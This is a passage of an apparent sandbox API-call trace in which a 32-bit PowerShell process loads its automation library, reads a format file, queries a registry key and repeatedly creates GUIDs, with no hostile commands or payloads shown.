lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.898] GetLastError () returned 0x0 [0089.898] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.898] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.899] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xbf5f3c6, Data2=0xb56c, Data3=0x4992, Data4=([0]=0x9b, [1]=0x95, [2]=0x83, [3]=0xec, [4]=0x7d, [5]=0x8b, [6]=0x58, [7]=0x12))) returned 0x0 [0089.901] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x2414274c, Data2=0x9305, Data3=0x46b6, Data4=([0]=0xa4, [1]=0xf2, [2]=0x18, [3]=0xd3, [4]=0xe4, [5]=0x6b, [6]=0x48, [7]=0xda))) returned 0x0 [0089.902] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x2eb07b6, Data2=0xcd8d, Data3=0x4706, Data4=([0]=0x8f, [1]=0x83, [2]=0x2f, [3]=0xfe, [4]=0x54, [5]=0x21, [6]=0x8f, [7]=0x36))) returned 0x0 [0089.902] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xd3b6927b, Data2=0x7fb0, Data3=0x4c3d, Data4=([0]=0xba, [1]=0x11, [2]=0x61, [3]=0xce, [4]=0x68, [5]=0x83, [6]=0x35, [7]=0x5b))) returned 0x0 [0089.902] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xf10f485b, Data2=0xf217, Data3=0x4f10, Data4=([0]=0x8f, [1]=0xb1, [2]=0x1b, [3]=0x25, [4]=0x98, [5]=0x3e, [6]=0x6c, [7]=0x38))) returned 0x0 [0089.903] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xdf92d936, Data2=0x8e0d, Data3=0x423e, Data4=([0]=0xae, [1]=0x16, [2]=0x9a, [3]=0x6d, [4]=0x1c, [5]=0xa1, [6]=0x64, [7]=0xae))) returned 0x0 [0089.903] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x3bc4586e, Data2=0xc740, Data3=0x458b, Data4=([0]=0xa6, [1]=0x1a, [2]=0x85, [3]=0x6e, [4]=0x7c, [5]=0x42, [6]=0xd6, [7]=0xba))) returned 0x0 [0089.903] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x638ec286, Data2=0xd2c2, Data3=0x4fe7, Data4=([0]=0x8e, [1]=0x44, [2]=0xe8, [3]=0x3c, [4]=0x79, [5]=0x2d, [6]=0xe3, [7]=0x78))) returned 0x0 [0089.903] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xd63258b2, Data2=0xd61, Data3=0x4d45, Data4=([0]=0xb9, [1]=0xa8, [2]=0x96, [3]=0xba, [4]=0xc9, [5]=0xcf, [6]=0x8f, [7]=0x67))) returned 0x0 [0089.903] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe2da1627, Data2=0x7f11, Data3=0x4c18, Data4=([0]=0xae, [1]=0x47, [2]=0x10, [3]=0x0, [4]=0x9e, [5]=0x95, [6]=0x4a, [7]=0xe4))) returned 0x0 [0089.904] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.904] GetLastError () returned 0x0 [0089.904] GetFileType (hFile=0x324) returned 0x1 [0089.904] SetErrorMode (uMode=0x1) returned 0x1 [0089.904] GetFileType (hFile=0x324) returned 0x1 [0089.904] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.905] GetLastError () returned 0x0 [0089.906] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.906] GetLastError () returned 0x0 [0089.906] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.906] GetLastError () returned 0x0 [0089.907] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.907] GetLastError () returned 0x0 [0089.907] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.907] GetLastError () returned 0x0 [0089.907] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.907] GetLastError () returned 0x0 [0089.907] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.907] GetLastError () returned 0x0 [0089.907] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.908] GetLastError () returned 0x0 [0089.908] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.908] GetLastError () returned 0x0 [0089.908] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.908] GetLastError () returned 0x0 [0089.908] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.908] GetLastError () returned 0x0 [0089.908] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.908] GetLastError () returned 0x0 [0089.909] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.909] GetLastError () returned 0x0 [0089.909] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.909] GetLastError () returned 0x0 [0089.909] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.909] GetLastError () returned 0x0 [0089.909] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.909] GetLastError () returned 0x0 [0089.909] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.909] GetLastError () returned 0x0 [0089.910] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.911] GetLastError () returned 0x0 [0089.911] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.911] GetLastError () returned 0x0 [0089.911] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.911] GetLastError () returned 0x0 [0089.911] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.911] GetLastError () returned 0x0 [0089.911] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0xe67, lpOverlapped=0x0) returned 1 [0089.911] GetLastError () returned 0x0 [0089.911] ReadFile (in: hFile=0x324, lpBuffer=0x348c41f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348c41f*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.911] GetLastError () returned 0x0 [0089.911] ReadFile (in: hFile=0x324, lpBuffer=0x348ce18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x348ce18*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.911] GetLastError () returned 0x0 [0089.912] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.912] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.912] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.912] RegCloseKey (hKey=0x324) returned 0x0 [0089.914] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xc8988868, Data2=0xca03, Data3=0x47f2, Data4=([0]=0x94, [1]=0xc7, [2]=0x20, [3]=0x7d, [4]=0xe2, [5]=0x9e, [6]=0xbe, [7]=0x1e))) returned 0x0 [0089.914] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x69413cfa, Data2=0xf8cd, Data3=0x47fd, Data4=([0]=0xac, [1]=0x56, [2]=0x65, [3]=0x54, [4]=0x32, [5]=0x90, [6]=0x88, [7]=0xd5))) returned 0x0 [0089.914] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x1bd34304, Data2=0x4108, Data3=0x4753, Data4=([0]=0x8c, [1]=0x3c, [2]=0x98, [3]=0x4e, [4]=0x1c, [5]=0x81, [6]=0x9b, [7]=0x21))) returned 0x0 [0089.914] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x1bfc6a6d, Data2=0xa404, Data3=0x43cd, Data4=([0]=0xb6, [1]=0x61, [2]=0x4c, [3]=0x50, [4]=0xe3, [5]=0x88, [6]=0x70, [7]=0x8f))) returned 0x0 [0089.914] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4b30df70, Data2=0x9da1, Data3=0x4316, Data4=([0]=0xa8, [1]=0x53, [2]=0xb2, [3]=0xa7, [4]=0x7d, [5]=0x2e, [6]=0x87, [7]=0xae))) returned 0x0 [0089.914] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xccb86ccb, Data2=0xcc80, Data3=0x4fbf, Data4=([0]=0x9f, [1]=0x13, [2]=0xb1, [3]=0xf2, [4]=0x9e, [5]=0x6e, [6]=0xfd, [7]=0x29))) returned 0x0 [0089.914] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xa9eb2057, Data2=0x6a63, Data3=0x4dc3, Data4=([0]=0x87, [1]=0x65, [2]=0x7b, [3]=0xfa, [4]=0x8d, [5]=0x50, [6]=0xdf, [7]=0xfe))) returned 0x0 [0089.915] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x6cbc1864, Data2=0xccb6, Data3=0x4b46, Data4=([0]=0x8a, [1]=0xc, [2]=0x4d, [3]=0xa8, [4]=0x3a, [5]=0x8b, [6]=0x3c, [7]=0x5))) returned 0x0 [0089.915] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe6bf93c9, Data2=0x2d13, Data3=0x4e6d, Data4=([0]=0x81, [1]=0x97, [2]=0x28, [3]=0x6a, [4]=0x69, [5]=0x5b, [6]=0x63, [7]=0xa1))) returned 0x0 [0089.915] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xce1dcad0, Data2=0xc371, Data3=0x4f55, Data4=([0]=0x95, [1]=0x90, [2]=0x43, [3]=0xd2, [4]=0xb, [5]=0xe0, [6]=0x3e, [7]=0xd))) returned 0x0 [0089.915] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe3c3a24f, Data2=0x958f, Data3=0x4731, Data4=([0]=0x86, [1]=0x4d, [2]=0x89, [3]=0x87, [4]=0x3c, [5]=0xf, [6]=0xa, [7]=0x4f))) returned 0x0 [0089.915] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x30ce401f, Data2=0x8ebf, Data3=0x483d, Data4=([0]=0xa5, [1]=0x6f, [2]=0xb, [3]=0x70, [4]=0x8a, [5]=0x7e, [6]=0x15, [7]=0x85))) returned 0x0 [0089.916] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9a974c9c, Data2=0xb152, Data3=0x440b, Data4=([0]=0x99, [1]=0x21, [2]=0x8a, [3]=0xfa, [4]=0x17, [5]=0x24, [6]=0x1b, [7]=0x7d))) returned 0x0 [0089.916] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x136d85e5, Data2=0xe2c3, Data3=0x4a0f, Data4=([0]=0x9a, [1]=0xd0, [2]=0x8, [3]=0xd3, [4]=0x9, [5]=0x2f, [6]=0x60, [7]=0x5))) returned 0x0 [0089.916] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9bd5196c, Data2=0xfb6e, Data3=0x49ab, Data4=([0]=0x8f, [1]=0x2f, [2]=0xbc, [3]=0x7d, [4]=0xce, [5]=0x92, [6]=0x1b, [7]=0x15))) returned 0x0 [0089.916] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xf9d367ac, Data2=0xbebc, Data3=0x4686, Data4=([0]=0xbb, [1]=0xe3, [2]=0x1d, [3]=0xa2, [4]=0x60, [5]=0xfa, [6]=0x15, [7]=0x76))) returned 0x0 [0089.916] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x239da7ef, Data2=0xf7, Data3=0x4e86, Data4=([0]=0x8f, [1]=0x41, [2]=0x8f, [3]=0xb6, [4]=0x5c, [5]=0x84, [6]=0xde, [7]=0xa8))) returned 0x0 [0089.916] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xab329b1f, Data2=0x546a, Data3=0x4f08, Data4=([0]=0x8f, [1]=0x41, [2]=0xf6, [3]=0xd, [4]=0x66, [5]=0x49, [6]=0xf7, [7]=0xb0))) returned 0x0 [0089.916] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x858d1fb1, Data2=0x1509, Data3=0x4f57, Data4=([0]=0x93, [1]=0xd1, [2]=0xdb, [3]=0x3e, [4]=0x9d, [5]=0x21, [6]=0x3c, [7]=0xf2))) returned 0x0 [0089.917] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x112aad85, Data2=0xb2dc, Data3=0x4fa6, Data4=([0]=0xbf, [1]=0x32, [2]=0x72, [3]=0xcd, [4]=0xd6, [5]=0x8b, [6]=0x79, [7]=0x43))) returned 0x0 [0089.917] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4041b2d7, Data2=0xb8e8, Data3=0x41f3, Data4=([0]=0xb5, [1]=0x52, [2]=0xc9, [3]=0x2b, [4]=0x7c, [5]=0x44, [6]=0xbd, [7]=0xc))) returned 0x0 [0089.917] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xa6915e1a, Data2=0x2ba5, Data3=0x4c94, Data4=([0]=0xa3, [1]=0xbc, [2]=0x74, [3]=0x9c, [4]=0x99, [5]=0xda, [6]=0x78, [7]=0xe2))) returned 0x0 [0089.917] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xc959848c, Data2=0x49d1, Data3=0x432c, Data4=([0]=0x93, [1]=0xa3, [2]=0x6e, [3]=0x39, [4]=0x73, [5]=0x28, [6]=0x95, [7]=0x34))) returned 0x0 [0089.917] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4ba32834, Data2=0x3b87, Data3=0x4b2a, Data4=([0]=0x99, [1]=0x2, [2]=0x2f, [3]=0xf1, [4]=0xc8, [5]=0x95, [6]=0xb1, [7]=0x32))) returned 0x0 [0089.917] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xa9067b8c, Data2=0x5172, Data3=0x4aef, Data4=([0]=0xa1, [1]=0x28, [2]=0xb5, [3]=0x3, [4]=0x5e, [5]=0x77, [6]=0xf, [7]=0x3d))) returned 0x0 [0089.917] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x3df76844, Data2=0xb0f8, Data3=0x4630, Data4=([0]=0x96, [1]=0xa3, [2]=0xbb, [3]=0xb4, [4]=0x80, [5]=0x2d, [6]=0x5a, [7]=0x22))) returned 0x0 [0089.918] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x2d4427aa, Data2=0x2889, Data3=0x4fe1, Data4=([0]=0xad, [1]=0xe9, [2]=0xf4, [3]=0x30, [4]=0x5e, [5]=0x35, [6]=0xed, [7]=0x9f))) returned 0x0 [0089.918] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x91796869, Data2=0x936, Data3=0x48ed, Data4=([0]=0x95, [1]=0xc3, [2]=0xb8, [3]=0xec, [4]=0x5c, [5]=0x49, [6]=0x7a, [7]=0x44))) returned 0x0 [0089.918] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x83bd68c, Data2=0x4ace, Data3=0x4f75, Data4=([0]=0xae, [1]=0xe6, [2]=0x8a, [3]=0x37, [4]=0xed, [5]=0xd6, [6]=0xb2, [7]=0xe9))) returned 0x0 [0089.918] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4fbe5fc8, Data2=0x75e1, Data3=0x4018, Data4=([0]=0xb2, [1]=0x55, [2]=0xdd, [3]=0x87, [4]=0x7c, [5]=0x38, [6]=0x48, [7]=0x35))) returned 0x0 [0089.918] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x47d902be, Data2=0x4fc9, Data3=0x4983, Data4=([0]=0xb5, [1]=0x74, [2]=0xd, [3]=0xfb, [4]=0x9b, [5]=0x4a, [6]=0x65, [7]=0x26))) returned 0x0 [0089.918] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xdd9f7755, Data2=0x399d, Data3=0x4e7a, Data4=([0]=0x9e, [1]=0x9c, [2]=0xb8, [3]=0xce, [4]=0x68, [5]=0xf3, [6]=0xc7, [7]=0xef))) returned 0x0 [0089.918] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x84083645, Data2=0x7d27, Data3=0x4048, Data4=([0]=0x91, [1]=0xe5, [2]=0x6e, [3]=0xe9, [4]=0x53, [5]=0xf7, [6]=0x61, [7]=0xd8))) returned 0x0 [0089.920] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x8f33bf25, Data2=0x6858, Data3=0x4d1c, Data4=([0]=0x84, [1]=0x69, [2]=0x33, [3]=0xa2, [4]=0xda, [5]=0xbc, [6]=0xee, [7]=0xc0))) returned 0x0 [0089.920] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x8d3a7878, Data2=0x9258, Data3=0x43c2, Data4=([0]=0xab, [1]=0xb3, [2]=0x66, [3]=0x30, [4]=0xac, [5]=0x3f, [6]=0x78, [7]=0xc8))) returned 0x0 [0089.920] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x38233d33, Data2=0x1d74, Data3=0x480f, Data4=([0]=0xa7, [1]=0xf8, [2]=0x71, [3]=0x0, [4]=0xae, [5]=0xf0, [6]=0x2a, [7]=0xaa))) returned 0x0 [0089.920] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xf64e0949, Data2=0x24b5, Data3=0x4cd5, Data4=([0]=0x81, [1]=0x69, [2]=0xc5, [3]=0x1e, [4]=0x3c, [5]=0xc8, [6]=0x38, [7]=0x5f))) returned 0x0 [0089.920] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xb07089fe, Data2=0x6c28, Data3=0x4ce3, Data4=([0]=0xba, [1]=0x90, [2]=0x27, [3]=0x20, [4]=0x36, [5]=0x2a, [6]=0x9c, [7]=0xe1))) returned 0x0 [0089.920] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x2481edb4, Data2=0x968e, Data3=0x4f94, Data4=([0]=0x8f, [1]=0x82, [2]=0xe4, [3]=0xf2, [4]=0x7, [5]=0x32, [6]=0x22, [7]=0x17))) returned 0x0 [0089.920] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x3e09301c, Data2=0xabc7, Data3=0x4e0f, Data4=([0]=0x86, [1]=0xb8, [2]=0x5, [3]=0x7e, [4]=0xc2, [5]=0xbd, [6]=0xb, [7]=0x38))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xcda178f6, Data2=0xbf9d, Data3=0x4a2b, Data4=([0]=0x93, [1]=0x20, [2]=0xdc, [3]=0x38, [4]=0xfd, [5]=0xa1, [6]=0xd6, [7]=0xa1))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4cc6dc4b, Data2=0x5532, Data3=0x4d73, Data4=([0]=0xab, [1]=0x5d, [2]=0x94, [3]=0x39, [4]=0x90, [5]=0x89, [6]=0xd7, [7]=0xe3))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4a3bc5ea, Data2=0x85b0, Data3=0x4e90, Data4=([0]=0x94, [1]=0x96, [2]=0xab, [3]=0x52, [4]=0x29, [5]=0x7c, [6]=0xaa, [7]=0x9b))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x1718d0b4, Data2=0xb56f, Data3=0x4aee, Data4=([0]=0xb5, [1]=0xeb, [2]=0xf, [3]=0xb3, [4]=0x40, [5]=0xfe, [6]=0xe6, [7]=0xee))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xb883cb65, Data2=0xc60a, Data3=0x430f, Data4=([0]=0x91, [1]=0xd2, [2]=0x94, [3]=0xae, [4]=0xe3, [5]=0xe5, [6]=0x8, [7]=0x8e))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x5a140b7f, Data2=0xf8cd, Data3=0x47d7, Data4=([0]=0xb2, [1]=0xc0, [2]=0xeb, [3]=0x8f, [4]=0x4c, [5]=0x26, [6]=0x6a, [7]=0x3e))) returned 0x0 [0089.921] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xaa2b2cbf, Data2=0x45d2, Data3=0x43ed, Data4=([0]=0x8b, 